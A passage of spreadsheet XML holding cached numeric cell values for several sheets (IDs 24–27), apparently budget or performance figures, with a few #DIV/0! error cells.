          <cell r="V77">
            <v>59.7111344537829</v>
          </cell>
          <cell r="W77">
            <v>18.3</v>
          </cell>
          <cell r="X77">
            <v>17.75</v>
          </cell>
          <cell r="Y77">
            <v>19.76</v>
          </cell>
        </row>
        <row r="79">
          <cell r="Q79">
            <v>9.75</v>
          </cell>
          <cell r="R79">
            <v>273.696666666667</v>
          </cell>
          <cell r="S79">
            <v>3911.25555555556</v>
          </cell>
          <cell r="T79">
            <v>40.625</v>
          </cell>
          <cell r="U79">
            <v>49.582729468599</v>
          </cell>
          <cell r="V79">
            <v>45.6495746446727</v>
          </cell>
          <cell r="W79">
            <v>90.051282051282</v>
          </cell>
          <cell r="X79">
            <v>100.88175474065</v>
          </cell>
          <cell r="Y79">
            <v>102.163613275646</v>
          </cell>
        </row>
        <row r="80">
          <cell r="Q80">
            <v>10</v>
          </cell>
          <cell r="R80">
            <v>196.4975</v>
          </cell>
          <cell r="S80">
            <v>2801.35333333333</v>
          </cell>
          <cell r="T80">
            <v>41.6666666666667</v>
          </cell>
          <cell r="U80">
            <v>35.5973731884058</v>
          </cell>
          <cell r="V80">
            <v>32.6955337690632</v>
          </cell>
          <cell r="W80">
            <v>87.2</v>
          </cell>
          <cell r="X80">
            <v>84.0875838114989</v>
          </cell>
          <cell r="Y80">
            <v>79.4755154056492</v>
          </cell>
        </row>
        <row r="81">
          <cell r="Q81">
            <v>14.8333333333333</v>
          </cell>
          <cell r="R81">
            <v>172.215</v>
          </cell>
          <cell r="S81">
            <v>3067.97833333333</v>
          </cell>
          <cell r="T81">
            <v>61.8055555555556</v>
          </cell>
          <cell r="U81">
            <v>31.1983695652174</v>
          </cell>
          <cell r="V81">
            <v>35.8074035169624</v>
          </cell>
          <cell r="W81">
            <v>264</v>
          </cell>
          <cell r="X81">
            <v>279.173184681938</v>
          </cell>
          <cell r="Y81">
            <v>275.876723379728</v>
          </cell>
        </row>
      </sheetData>
      <sheetData sheetId="24">
        <row r="7">
          <cell r="P7">
            <v>200</v>
          </cell>
          <cell r="Q7">
            <v>0</v>
          </cell>
        </row>
        <row r="7">
          <cell r="Y7">
            <v>0</v>
          </cell>
        </row>
        <row r="8">
          <cell r="P8">
            <v>15340</v>
          </cell>
          <cell r="Q8">
            <v>10593.625</v>
          </cell>
          <cell r="R8">
            <v>0</v>
          </cell>
        </row>
        <row r="8">
          <cell r="V8">
            <v>571.4072</v>
          </cell>
        </row>
        <row r="8">
          <cell r="Y8">
            <v>7763.29030000004</v>
          </cell>
        </row>
        <row r="19">
          <cell r="D19">
            <v>105046.44300005</v>
          </cell>
          <cell r="E19">
            <v>4546.55000000002</v>
          </cell>
        </row>
        <row r="19">
          <cell r="I19">
            <v>4779.33</v>
          </cell>
        </row>
        <row r="19">
          <cell r="L19">
            <v>33216.9130000507</v>
          </cell>
        </row>
        <row r="22">
          <cell r="D22">
            <v>0</v>
          </cell>
          <cell r="E22">
            <v>0</v>
          </cell>
        </row>
        <row r="22">
          <cell r="I22">
            <v>0</v>
          </cell>
        </row>
        <row r="22">
          <cell r="L22">
            <v>0</v>
          </cell>
        </row>
        <row r="23">
          <cell r="E23">
            <v>0</v>
          </cell>
        </row>
        <row r="23">
          <cell r="L23">
            <v>0</v>
          </cell>
        </row>
        <row r="24">
          <cell r="D24">
            <v>48852.6839999998</v>
          </cell>
          <cell r="E24">
            <v>5861</v>
          </cell>
        </row>
        <row r="24">
          <cell r="I24">
            <v>4834.242</v>
          </cell>
        </row>
        <row r="24">
          <cell r="L24">
            <v>29722.7069999998</v>
          </cell>
        </row>
        <row r="25">
          <cell r="D25">
            <v>6404.32</v>
          </cell>
          <cell r="E25">
            <v>0</v>
          </cell>
        </row>
        <row r="25">
          <cell r="I25">
            <v>442.9</v>
          </cell>
        </row>
        <row r="25">
          <cell r="L25">
            <v>5451.22</v>
          </cell>
        </row>
        <row r="26">
          <cell r="D26">
            <v>12294.42</v>
          </cell>
          <cell r="E26">
            <v>0</v>
          </cell>
        </row>
        <row r="26">
          <cell r="I26">
            <v>621</v>
          </cell>
        </row>
        <row r="26">
          <cell r="L26">
            <v>9795.01000000001</v>
          </cell>
        </row>
        <row r="27">
          <cell r="D27">
            <v>22859.412</v>
          </cell>
          <cell r="E27">
            <v>5861</v>
          </cell>
        </row>
        <row r="27">
          <cell r="I27">
            <v>2916.622</v>
          </cell>
        </row>
        <row r="27">
          <cell r="L27">
            <v>10851.125</v>
          </cell>
        </row>
        <row r="28">
          <cell r="D28">
            <v>5272.30199999999</v>
          </cell>
          <cell r="E28">
            <v>0</v>
          </cell>
        </row>
        <row r="28">
          <cell r="I28">
            <v>395.5</v>
          </cell>
        </row>
        <row r="28">
          <cell r="L28">
            <v>1743.30199999999</v>
          </cell>
        </row>
        <row r="29">
          <cell r="D29">
            <v>0</v>
          </cell>
          <cell r="E29">
            <v>0</v>
          </cell>
        </row>
        <row r="29">
          <cell r="I29">
            <v>0</v>
          </cell>
        </row>
        <row r="29">
          <cell r="L29">
            <v>0</v>
          </cell>
        </row>
        <row r="30">
          <cell r="P30">
            <v>8550</v>
          </cell>
          <cell r="Q30">
            <v>3251.37400000001</v>
          </cell>
          <cell r="R30">
            <v>294.06</v>
          </cell>
        </row>
        <row r="30">
          <cell r="V30">
            <v>243</v>
          </cell>
        </row>
        <row r="30">
          <cell r="Y30">
            <v>3177.91600000001</v>
          </cell>
        </row>
        <row r="47">
          <cell r="I47">
            <v>0</v>
          </cell>
        </row>
        <row r="63">
          <cell r="E63">
            <v>0</v>
          </cell>
        </row>
        <row r="63">
          <cell r="I63">
            <v>246.33</v>
          </cell>
        </row>
        <row r="72">
          <cell r="Q72">
            <v>1e-6</v>
          </cell>
          <cell r="R72">
            <v>2.4e-5</v>
          </cell>
          <cell r="S72">
            <v>0.000365</v>
          </cell>
          <cell r="T72">
            <v>4.16666666666667e-6</v>
          </cell>
          <cell r="U72">
            <v>4.16666666666667e-6</v>
          </cell>
          <cell r="V72">
            <v>4.24813780260708e-6</v>
          </cell>
          <cell r="W72">
            <v>1e-5</v>
          </cell>
          <cell r="X72">
            <v>9.99999999999999e-6</v>
          </cell>
          <cell r="Y72">
            <v>9.15068493150685e-6</v>
          </cell>
        </row>
        <row r="73">
          <cell r="Q73">
            <v>24.000001</v>
          </cell>
          <cell r="R73">
            <v>113.910024</v>
          </cell>
          <cell r="S73">
            <v>5895.640365</v>
          </cell>
          <cell r="T73">
            <v>100.000004166667</v>
          </cell>
          <cell r="U73">
            <v>19.7760458333333</v>
          </cell>
          <cell r="V73">
            <v>68.6177882332402</v>
          </cell>
          <cell r="W73">
            <v>189.439575440018</v>
          </cell>
          <cell r="X73">
            <v>174.692966441656</v>
          </cell>
          <cell r="Y73">
            <v>238.051584410034</v>
          </cell>
        </row>
        <row r="76">
          <cell r="Q76">
            <v>1e-11</v>
          </cell>
          <cell r="R76">
            <v>2.3e-10</v>
          </cell>
          <cell r="S76">
            <v>3.53e-9</v>
          </cell>
          <cell r="T76">
            <v>4.16666666666667e-11</v>
          </cell>
          <cell r="U76">
            <v>3.99305555555555e-11</v>
          </cell>
          <cell r="V76">
            <v>4.1084729981378e-11</v>
          </cell>
          <cell r="W76">
            <v>0</v>
          </cell>
          <cell r="X76">
            <v>0</v>
          </cell>
          <cell r="Y76">
            <v>0</v>
          </cell>
        </row>
        <row r="77">
          <cell r="Q77">
            <v>24.00000000001</v>
          </cell>
          <cell r="R77">
            <v>80.23000000001</v>
          </cell>
          <cell r="S77">
            <v>5140.05000000012</v>
          </cell>
          <cell r="T77">
            <v>100.000000000042</v>
          </cell>
          <cell r="U77">
            <v>13.9288194444462</v>
          </cell>
          <cell r="V77">
            <v>59.8236731843589</v>
          </cell>
          <cell r="W77">
            <v>20.76</v>
          </cell>
          <cell r="X77">
            <v>18.65</v>
          </cell>
          <cell r="Y77">
            <v>19.76</v>
          </cell>
        </row>
        <row r="79">
          <cell r="Q79">
            <v>0</v>
          </cell>
          <cell r="R79">
            <v>273.696666666667</v>
          </cell>
          <cell r="S79">
            <v>3911.25555555556</v>
          </cell>
          <cell r="T79">
            <v>0</v>
          </cell>
          <cell r="U79">
            <v>47.5167824074074</v>
          </cell>
          <cell r="V79">
            <v>45.5220618663356</v>
          </cell>
          <cell r="W79" t="e">
            <v>#DIV/0!</v>
          </cell>
          <cell r="X79">
            <v>100.88175474065</v>
          </cell>
          <cell r="Y79">
            <v>102.163613275646</v>
          </cell>
        </row>
        <row r="80">
          <cell r="Q80">
            <v>0</v>
          </cell>
          <cell r="R80">
            <v>196.4975</v>
          </cell>
          <cell r="S80">
            <v>2801.35333333333</v>
          </cell>
          <cell r="T80">
            <v>0</v>
          </cell>
          <cell r="U80">
            <v>34.1141493055556</v>
          </cell>
          <cell r="V80">
            <v>32.6042054624457</v>
          </cell>
          <cell r="W80" t="e">
            <v>#DIV/0!</v>
          </cell>
          <cell r="X80">
            <v>84.0875838114989</v>
          </cell>
          <cell r="Y80">
            <v>79.4755154056492</v>
          </cell>
        </row>
        <row r="81">
          <cell r="Q81">
            <v>20.9166666666667</v>
          </cell>
          <cell r="R81">
            <v>193.131666666667</v>
          </cell>
          <cell r="S81">
            <v>3088.895</v>
          </cell>
          <cell r="T81">
            <v>87.1527777777778</v>
          </cell>
          <cell r="U81">
            <v>33.5298032407407</v>
          </cell>
          <cell r="V81">
            <v>35.9508263500931</v>
          </cell>
          <cell r="W81">
            <v>280.207171314741</v>
          </cell>
          <cell r="X81">
            <v>279.285168149535</v>
          </cell>
          <cell r="Y81">
            <v>275.90604730818</v>
          </cell>
        </row>
      </sheetData>
      <sheetData sheetId="25">
        <row r="7">
          <cell r="P7">
            <v>200</v>
          </cell>
          <cell r="Q7">
            <v>0</v>
          </cell>
        </row>
        <row r="7">
          <cell r="Y7">
            <v>0</v>
          </cell>
        </row>
        <row r="8">
          <cell r="P8">
            <v>15340</v>
          </cell>
          <cell r="Q8">
            <v>10593.625</v>
          </cell>
          <cell r="R8">
            <v>0</v>
          </cell>
        </row>
        <row r="8">
          <cell r="V8">
            <v>644.7742</v>
          </cell>
        </row>
        <row r="8">
          <cell r="Y8">
            <v>7118.51610000004</v>
          </cell>
        </row>
        <row r="19">
          <cell r="D19">
            <v>105046.44300005</v>
          </cell>
          <cell r="E19">
            <v>5190.99000000002</v>
          </cell>
        </row>
        <row r="19">
          <cell r="I19">
            <v>2060.1</v>
          </cell>
        </row>
        <row r="19">
          <cell r="L19">
            <v>36347.8030000507</v>
          </cell>
        </row>
        <row r="22">
          <cell r="D22">
            <v>0</v>
          </cell>
          <cell r="E22">
            <v>0</v>
          </cell>
        </row>
        <row r="22">
          <cell r="I22">
            <v>0</v>
          </cell>
        </row>
        <row r="22">
          <cell r="L22">
            <v>0</v>
          </cell>
        </row>
        <row r="23">
          <cell r="E23">
            <v>0</v>
          </cell>
        </row>
        <row r="23">
          <cell r="L23">
            <v>0</v>
          </cell>
        </row>
        <row r="24">
          <cell r="D24">
            <v>48852.6839999998</v>
          </cell>
          <cell r="E24">
            <v>2793</v>
          </cell>
        </row>
        <row r="24">
          <cell r="I24">
            <v>3424.69</v>
          </cell>
        </row>
        <row r="24">
          <cell r="L24">
            <v>29091.0169999998</v>
          </cell>
        </row>
        <row r="25">
          <cell r="D25">
            <v>6404.32</v>
          </cell>
          <cell r="E25">
            <v>0</v>
          </cell>
        </row>
        <row r="25">
          <cell r="I25">
            <v>377.02</v>
          </cell>
        </row>
        <row r="25">
          <cell r="L25">
            <v>5074.2</v>
          </cell>
        </row>
        <row r="26">
          <cell r="D26">
            <v>12294.42</v>
          </cell>
          <cell r="E26">
            <v>457</v>
          </cell>
        </row>
        <row r="26">
          <cell r="I26">
            <v>535</v>
          </cell>
        </row>
        <row r="26">
          <cell r="L26">
            <v>9717.01000000001</v>
          </cell>
        </row>
        <row r="27">
          <cell r="D27">
            <v>22859.412</v>
          </cell>
          <cell r="E27">
            <v>2101</v>
          </cell>
        </row>
        <row r="27">
          <cell r="I27">
            <v>1961.9</v>
          </cell>
        </row>
        <row r="27">
          <cell r="L27">
            <v>10990.225</v>
          </cell>
        </row>
        <row r="28">
          <cell r="D28">
            <v>5272.30199999999</v>
          </cell>
          <cell r="E28">
            <v>0</v>
          </cell>
        </row>
        <row r="28">
          <cell r="I28">
            <v>240</v>
          </cell>
        </row>
        <row r="28">
          <cell r="L28">
            <v>1503.30199999999</v>
          </cell>
        </row>
        <row r="29">
          <cell r="D29">
            <v>0</v>
          </cell>
          <cell r="E29">
            <v>0</v>
          </cell>
        </row>
        <row r="29">
          <cell r="I29">
            <v>0</v>
          </cell>
        </row>
        <row r="29">
          <cell r="L29">
            <v>0</v>
          </cell>
        </row>
        <row r="30">
          <cell r="P30">
            <v>8550</v>
          </cell>
          <cell r="Q30">
            <v>3251.37400000001</v>
          </cell>
          <cell r="R30">
            <v>202.14</v>
          </cell>
        </row>
        <row r="30">
          <cell r="V30">
            <v>120.9</v>
          </cell>
        </row>
        <row r="30">
          <cell r="Y30">
            <v>3259.15600000001</v>
          </cell>
        </row>
        <row r="47">
          <cell r="I47">
            <v>0</v>
          </cell>
        </row>
        <row r="63">
          <cell r="E63">
            <v>0</v>
          </cell>
        </row>
        <row r="63">
          <cell r="I63">
            <v>0</v>
          </cell>
        </row>
        <row r="72">
          <cell r="Q72">
            <v>1e-6</v>
          </cell>
          <cell r="R72">
            <v>2.5e-5</v>
          </cell>
          <cell r="S72">
            <v>0.000366</v>
          </cell>
          <cell r="T72">
            <v>4.16666666666667e-6</v>
          </cell>
          <cell r="U72">
            <v>4.16666666666667e-6</v>
          </cell>
          <cell r="V72">
            <v>4.24791086350975e-6</v>
          </cell>
          <cell r="W72">
            <v>1e-5</v>
          </cell>
          <cell r="X72">
            <v>1e-5</v>
          </cell>
          <cell r="Y72">
            <v>9.15300546448087e-6</v>
          </cell>
        </row>
        <row r="73">
          <cell r="Q73">
            <v>24.000001</v>
          </cell>
          <cell r="R73">
            <v>137.910025</v>
          </cell>
          <cell r="S73">
            <v>5919.640366</v>
          </cell>
          <cell r="T73">
            <v>100.000004166667</v>
          </cell>
          <cell r="U73">
            <v>22.9850041666667</v>
          </cell>
          <cell r="V73">
            <v>68.7052038765088</v>
          </cell>
          <cell r="W73">
            <v>216.291240987865</v>
          </cell>
          <cell r="X73">
            <v>181.932169180596</v>
          </cell>
          <cell r="Y73">
            <v>237.963361438434</v>
          </cell>
        </row>
        <row r="76">
          <cell r="Q76">
            <v>1e-11</v>
          </cell>
          <cell r="R76">
            <v>2.4e-10</v>
          </cell>
          <cell r="S76">
            <v>3.54e-9</v>
          </cell>
          <cell r="T76">
            <v>4.16666666666667e-11</v>
          </cell>
          <cell r="U76">
            <v>4e-11</v>
          </cell>
          <cell r="V76">
            <v>4.10863509749304e-11</v>
          </cell>
          <cell r="W76">
            <v>0</v>
          </cell>
          <cell r="X76">
            <v>0</v>
          </cell>
          <cell r="Y76">
            <v>0</v>
          </cell>
        </row>
        <row r="77">
          <cell r="Q77">
            <v>24.00000000001</v>
          </cell>
          <cell r="R77">
            <v>104.23000000001</v>
          </cell>
          <cell r="S77">
            <v>5164.05000000012</v>
          </cell>
          <cell r="T77">
            <v>100.000000000042</v>
          </cell>
          <cell r="U77">
            <v>17.3716666666683</v>
          </cell>
          <cell r="V77">
            <v>59.9355849582187</v>
          </cell>
          <cell r="W77">
            <v>21.14</v>
          </cell>
          <cell r="X77">
            <v>19.28</v>
          </cell>
          <cell r="Y77">
            <v>19.77</v>
          </cell>
        </row>
        <row r="79">
          <cell r="Q79">
            <v>2.08305555555556</v>
          </cell>
          <cell r="R79">
            <v>275.779722222222</v>
          </cell>
          <cell r="S79">
            <v>3913.33861111111</v>
          </cell>
          <cell r="T79">
            <v>8.67939814814817</v>
          </cell>
          <cell r="U79">
            <v>45.963287037037</v>
          </cell>
          <cell r="V79">
            <v>45.4194360621067</v>
          </cell>
          <cell r="W79">
            <v>112.8150420056</v>
          </cell>
          <cell r="X79">
            <v>100.971890810601</v>
          </cell>
          <cell r="Y79">
            <v>102.169282991455</v>
          </cell>
        </row>
        <row r="80">
          <cell r="Q80">
            <v>5</v>
          </cell>
          <cell r="R80">
            <v>201.4975</v>
          </cell>
          <cell r="S80">
            <v>2806.35333333333</v>
          </cell>
          <cell r="T80">
            <v>20.8333333333333</v>
          </cell>
          <cell r="U80">
            <v>33.5829166666667</v>
          </cell>
          <cell r="V80">
            <v>32.5714175177964</v>
          </cell>
          <cell r="W80">
            <v>91.4</v>
          </cell>
          <cell r="X80">
            <v>84.2690355959751</v>
          </cell>
          <cell r="Y80">
            <v>79.4967609210529</v>
          </cell>
        </row>
        <row r="81">
          <cell r="Q81">
            <v>6.5</v>
          </cell>
          <cell r="R81">
            <v>199.631666666667</v>
          </cell>
          <cell r="S81">
            <v>3095.395</v>
          </cell>
          <cell r="T81">
            <v>27.0833333333333</v>
          </cell>
          <cell r="U81">
            <v>33.2719444444444</v>
          </cell>
          <cell r="V81">
            <v>35.926125812442</v>
          </cell>
          <cell r="W81">
            <v>323.230769230769</v>
          </cell>
          <cell r="X81">
            <v>280.716035365131</v>
          </cell>
          <cell r="Y81">
            <v>276.005424186574</v>
          </cell>
        </row>
      </sheetData>
      <sheetData sheetId="26">
        <row r="7">
          <cell r="P7">
            <v>200</v>
          </cell>
          <cell r="Q7">
            <v>0</v>
          </cell>
        </row>
        <row r="7">
          <cell r="Y7">
            <v>0</v>
          </cell>
        </row>
        <row r="8">
          <cell r="P8">
            <v>15340</v>
          </cell>
          <cell r="Q8">
            <v>10593.625</v>
          </cell>
          <cell r="R8">
            <v>0</v>
          </cell>
        </row>
        <row r="8">
          <cell r="V8">
            <v>742.3</v>
          </cell>
        </row>
        <row r="8">
          <cell r="Y8">
            <v>6376.21610000004</v>
          </cell>
        </row>
        <row r="19">
          <cell r="D19">
            <v>105046.44300005</v>
          </cell>
          <cell r="E19">
            <v>5760.11000000002</v>
          </cell>
        </row>
        <row r="19">
          <cell r="I19">
            <v>6317.463</v>
          </cell>
        </row>
        <row r="19">
          <cell r="L19">
            <v>35790.4500000507</v>
          </cell>
        </row>
        <row r="22">
          <cell r="D22">
            <v>0</v>
          </cell>
          <cell r="E22">
            <v>0</v>
          </cell>
        </row>
        <row r="22">
          <cell r="I22">
            <v>0</v>
          </cell>
        </row>
        <row r="22">
          <cell r="L22">
            <v>0</v>
          </cell>
        </row>
        <row r="23">
          <cell r="E23">
            <v>0</v>
          </cell>
        </row>
        <row r="23">
          <cell r="L23">
            <v>0</v>
          </cell>
        </row>
        <row r="24">
          <cell r="D24">
            <v>48852.6839999998</v>
          </cell>
          <cell r="E24">
            <v>6824</v>
          </cell>
        </row>
        <row r="24">
          <cell r="I24">
            <v>4188.9</v>
          </cell>
        </row>
        <row r="24">
          <cell r="L24">
            <v>31726.1169999998</v>
          </cell>
        </row>
        <row r="25">
          <cell r="D25">
            <v>6404.32</v>
          </cell>
          <cell r="E25">
            <v>0</v>
          </cell>
        </row>
        <row r="25">
          <cell r="I25">
            <v>79.41</v>
          </cell>
        </row>
        <row r="25">
          <cell r="L25">
            <v>4994.79</v>
          </cell>
        </row>
        <row r="26">
          <cell r="D26">
            <v>12294.42</v>
          </cell>
          <cell r="E26">
            <v>2108</v>
          </cell>
        </row>
        <row r="26">
          <cell r="I26">
            <v>777</v>
          </cell>
        </row>
        <row r="26">
          <cell r="L26">
            <v>11048.01</v>
          </cell>
        </row>
        <row r="27">
          <cell r="D27">
            <v>22859.412</v>
          </cell>
          <cell r="E27">
            <v>2440</v>
          </cell>
        </row>
        <row r="27">
          <cell r="I27">
            <v>2257.32</v>
          </cell>
        </row>
        <row r="27">
          <cell r="L27">
            <v>11172.905</v>
          </cell>
        </row>
        <row r="28">
          <cell r="D28">
            <v>5272.30199999999</v>
          </cell>
          <cell r="E28">
            <v>800</v>
          </cell>
        </row>
        <row r="28">
          <cell r="I28">
            <v>274</v>
          </cell>
        </row>
        <row r="28">
          <cell r="L28">
            <v>2029.30199999999</v>
          </cell>
        </row>
        <row r="29">
          <cell r="D29">
            <v>0</v>
          </cell>
          <cell r="E29">
            <v>0</v>
          </cell>
        </row>
        <row r="29">
          <cell r="I29">
            <v>0</v>
          </cell>
        </row>
        <row r="29">
          <cell r="L29">
            <v>0</v>
          </cell>
        </row>
        <row r="30">
          <cell r="P30">
            <v>8550</v>
          </cell>
          <cell r="Q30">
            <v>3251.37400000001</v>
          </cell>
          <cell r="R30">
            <v>770.63</v>
          </cell>
        </row>
        <row r="30">
          <cell r="V30">
            <v>284</v>
          </cell>
        </row>
        <row r="30">
          <cell r="Y30">
            <v>3745.78600000001</v>
          </cell>
        </row>
        <row r="47">
          <cell r="I47">
            <v>0</v>
          </cell>
        </row>
        <row r="63">
          <cell r="E63">
            <v>0</v>
          </cell>
        </row>
        <row r="63">
          <cell r="I63">
            <v>1323.463</v>
          </cell>
        </row>
        <row r="72">
          <cell r="Q72">
            <v>1e-6</v>
          </cell>
          <cell r="R72">
            <v>2.6e-5</v>
          </cell>
          <cell r="S72">
            <v>0.000367</v>
          </cell>
          <cell r="T72">
            <v>4.16666666666667e-6</v>
          </cell>
          <cell r="U72">
            <v>4.16666666666667e-6</v>
          </cell>
          <cell r="V72">
            <v>4.24768518518519e-6</v>
          </cell>
          <cell r="W72">
            <v>1e-5</v>
          </cell>
          <cell r="X72">
            <v>1e-5</v>
          </cell>
          <cell r="Y72">
            <v>9.15531335149864e-6</v>
          </cell>
        </row>
        <row r="73">
          <cell r="Q73">
            <v>24.000001</v>
          </cell>
          <cell r="R73">
            <v>161.910026</v>
          </cell>
          <cell r="S73">
            <v>5943.640367</v>
          </cell>
          <cell r="T73">
            <v>100.000004166667</v>
          </cell>
          <cell r="U73">
            <v>25.9471195512821</v>
          </cell>
          <cell r="V73">
            <v>68.7921338773148</v>
          </cell>
          <cell r="W73">
            <v>240.004573333143</v>
          </cell>
          <cell r="X73">
            <v>190.540269569225</v>
          </cell>
          <cell r="Y73">
            <v>237.971603708237</v>
          </cell>
        </row>
        <row r="76">
          <cell r="Q76">
            <v>1e-11</v>
          </cell>
          <cell r="R76">
            <v>2.5e-10</v>
          </cell>
          <cell r="S76">
            <v>3.55e-9</v>
          </cell>
          <cell r="T76">
            <v>4.16666666666667e-11</v>
          </cell>
          <cell r="U76">
            <v>4.00641025641026e-11</v>
          </cell>
          <cell r="V76">
            <v>4.1087962962963e-11</v>
          </cell>
          <cell r="W76">
            <v>0</v>
          </cell>
          <cell r="X76">
            <v>0</v>
          </cell>
          <cell r="Y76">
            <v>0</v>
          </cell>
        </row>
        <row r="77">
          <cell r="Q77">
            <v>24.00000000001</v>
          </cell>
          <cell r="R77">
            <v>128.23000000001</v>
          </cell>
          <cell r="S77">
            <v>5188.05000000012</v>
          </cell>
          <cell r="T77">
            <v>100.000000000042</v>
          </cell>
          <cell r="U77">
            <v>20.5496794871811</v>
          </cell>
          <cell r="V77">
            <v>60.0468750000014</v>
          </cell>
          <cell r="W77">
            <v>23</v>
          </cell>
          <cell r="X77">
            <v>20.1</v>
          </cell>
          <cell r="Y77">
            <v>19.78</v>
          </cell>
        </row>
        <row r="79">
          <cell r="Q79">
            <v>23.9997222222222</v>
          </cell>
          <cell r="R79">
            <v>299.779444444444</v>
          </cell>
          <cell r="S79">
            <v>3937.33833333333</v>
          </cell>
          <cell r="T79">
            <v>99.9988425925926</v>
          </cell>
          <cell r="U79">
            <v>48.0415776353276</v>
          </cell>
          <cell r="V79">
            <v>45.5710455246914</v>
          </cell>
          <cell r="W79">
            <v>106.292896908529</v>
          </cell>
          <cell r="X79">
            <v>101.397879552189</v>
          </cell>
          <cell r="Y79">
            <v>102.194418141189</v>
          </cell>
        </row>
        <row r="80">
          <cell r="Q80">
            <v>24</v>
          </cell>
          <cell r="R80">
            <v>225.4975</v>
          </cell>
          <cell r="S80">
            <v>2830.35333333333</v>
          </cell>
          <cell r="T80">
            <v>100</v>
          </cell>
          <cell r="U80">
            <v>36.1374198717949</v>
          </cell>
          <cell r="V80">
            <v>32.7587191358025</v>
          </cell>
          <cell r="W80">
            <v>87.8333333333333</v>
          </cell>
          <cell r="X80">
            <v>84.6483885630661</v>
          </cell>
          <cell r="Y80">
            <v>79.5674509425207</v>
          </cell>
        </row>
        <row r="81">
          <cell r="Q81">
            <v>7.58305555555556</v>
          </cell>
          <cell r="R81">
            <v>207.214722222222</v>
          </cell>
          <cell r="S81">
            <v>3102.97805555556</v>
          </cell>
          <cell r="T81">
            <v>31.5960648148148</v>
          </cell>
          <cell r="U81">
            <v>33.2074875356125</v>
          </cell>
          <cell r="V81">
            <v>35.9140978652263</v>
          </cell>
          <cell r="W81">
            <v>285.504963551778</v>
          </cell>
          <cell r="X81">
            <v>280.891286950064</v>
          </cell>
          <cell r="Y81">
            <v>276.028639154089</v>
          </cell>
        </row>
      </sheetData>
      <sheetData sheetId="27">
        <row r="7">
          <cell r="P7">
            <v>200</v>
          </cell>
          <cell r="Q7">
            <v>0</v>
          </cell>
        </row>
        <row r="7">
          <cell r="Y7">
            <v>0</v>
          </cell>
        </row>
        <row r="8">
          <cell r="P8">
            <v>15340</v>
          </cell>
          <cell r="Q8">
            <v>10593.625</v>
          </cell>
          <cell r="R8">
            <v>0</v>
          </cell>
        </row>
        <row r="8">
          <cell r="V8">
            <v>747.72</v>
          </cell>
        </row>
        <row r="8">
          <cell r="Y8">
            <v>5628.49610000004</v>
          </cell>
        </row>
        <row r="19">
          <cell r="D19">
            <v>105046.44300005</v>
          </cell>
          <cell r="E19">
            <v>5859.74000000002</v>
          </cell>
        </row>
        <row r="19">
          <cell r="I19">
            <v>3595</v>
          </cell>
        </row>
        <row r="19">
          <cell r="L19">
            <v>38055.1900000507</v>
          </cell>
        </row>
        <row r="22">
          <cell r="D22">
            <v>0</v>
          </cell>
          <cell r="E22">
            <v>0</v>
          </cell>
        </row>
        <row r="22">
          <cell r="I22">
            <v>0</v>
          </cell>
        </row>
        <row r="22">
          <cell r="L22">
            <v>0</v>
          </cell>
        </row>
        <row r="23">
          <cell r="E23">
            <v>0</v>
          </cell>
        </row>
        <row r="23">
          <cell r="L23">
            <v>0</v>
          </cell>
        </row>
        <row r="24">
          <cell r="D24">
            <v>48852.6839999998</v>
          </cell>
          <cell r="E24">
            <v>4609</v>
          </cell>
        </row>
        <row r="24">
          <cell r="I24">
            <v>4099.59</v>
          </cell>
        </row>
        <row r="24">
          <cell r="L24">
            <v>32235.5269999998</v>
          </cell>
        </row>
        <row r="25">
          <cell r="D25">
            <v>6404.32</v>
          </cell>
          <cell r="E25">
            <v>1060</v>
          </cell>
        </row>
        <row r="25">
          <cell r="I25">
            <v>236.29</v>
          </cell>
        </row>
        <row r="25">
          <cell r="L25">
            <v>5818.5</v>
          </cell>
        </row>
        <row r="26">
          <cell r="D26">
            <v>12294.42</v>
          </cell>
          <cell r="E26">
            <v>818</v>
          </cell>
        </row>
        <row r="26">
          <cell r="I26">
            <v>683</v>
          </cell>
        </row>
        <row r="26">
          <cell r="L26">
            <v>11183.01</v>
          </cell>
        </row>
        <row r="27">
          <cell r="D27">
            <v>22859.412</v>
          </cell>
          <cell r="E27">
            <v>2129</v>
          </cell>
        </row>
        <row r="27">
          <cell r="I27">
            <v>2320.03</v>
          </cell>
        </row>
        <row r="27">
          <cell r="L27">
            <v>10981.875</v>
          </cell>
        </row>
        <row r="28">
          <cell r="D28">
            <v>5272.30199999999</v>
          </cell>
          <cell r="E28">
            <v>300</v>
          </cell>
        </row>
        <row r="28">
          <cell r="I28">
            <v>338</v>
          </cell>
        </row>
        <row r="28">
          <cell r="L28">
            <v>1991.30199999999</v>
          </cell>
        </row>
        <row r="29">
          <cell r="D29">
            <v>0</v>
          </cell>
          <cell r="E29">
            <v>0</v>
          </cell>
        </row>
        <row r="29">
          <cell r="I29">
            <v>0</v>
          </cell>
        </row>
        <row r="29">
          <cell r="L29">
            <v>0</v>
          </cell>
        </row>
        <row r="30">
          <cell r="P30">
            <v>8550</v>
          </cell>
          <cell r="Q30">
            <v>3251.37400000001</v>
          </cell>
          <cell r="R30">
            <v>0</v>
          </cell>
        </row>
        <row r="30">
          <cell r="V30">
            <v>190</v>
          </cell>
        </row>
        <row r="30">
          <cell r="Y30">
            <v>3555.78600000001</v>
          </cell>
        </row>
        <row r="47">
          <cell r="I47">
            <v>0</v>
          </cell>
        </row>
        <row r="63">
          <cell r="E63">
            <v>0</v>
          </cell>
        </row>
        <row r="63">
          <cell r="I63">
            <v>0</v>
          </cell>
        </row>
        <row r="72">
          <cell r="Q72">
            <v>1e-6</v>
          </cell>
          <cell r="R72">
            <v>2.7e-5</v>
          </cell>
          <cell r="S72">
            <v>0.000368</v>
          </cell>
          <cell r="T72">
            <v>4.16666666666667e-6</v>
          </cell>
          <cell r="U72">
            <v>4.16666666666667e-6</v>
          </cell>
          <cell r="V72">
            <v>4.24746075715605e-6</v>
          </cell>
          <cell r="W72">
            <v>1e-5</v>
          </cell>
          <cell r="X72">
            <v>1e-5</v>
          </cell>
          <cell r="Y72">
            <v>9.15760869565217e-6</v>
          </cell>
        </row>
        <row r="73">
          <cell r="Q73">
            <v>24.000001</v>
          </cell>
          <cell r="R73">
            <v>185.910027</v>
          </cell>
          <cell r="S73">
            <v>5967.640368</v>
          </cell>
          <cell r="T73">
            <v>100.000004166667</v>
          </cell>
          <cell r="U73">
            <v>28.6898189814815</v>
          </cell>
          <cell r="V73">
            <v>68.8785822714681</v>
          </cell>
          <cell r="W73">
            <v>244.155823160174</v>
          </cell>
          <cell r="X73">
            <v>197.461753905292</v>
          </cell>
          <cell r="Y73">
            <v>237.996474723224</v>
          </cell>
        </row>
        <row r="76">
          <cell r="Q76">
            <v>1e-11</v>
          </cell>
          <cell r="R76">
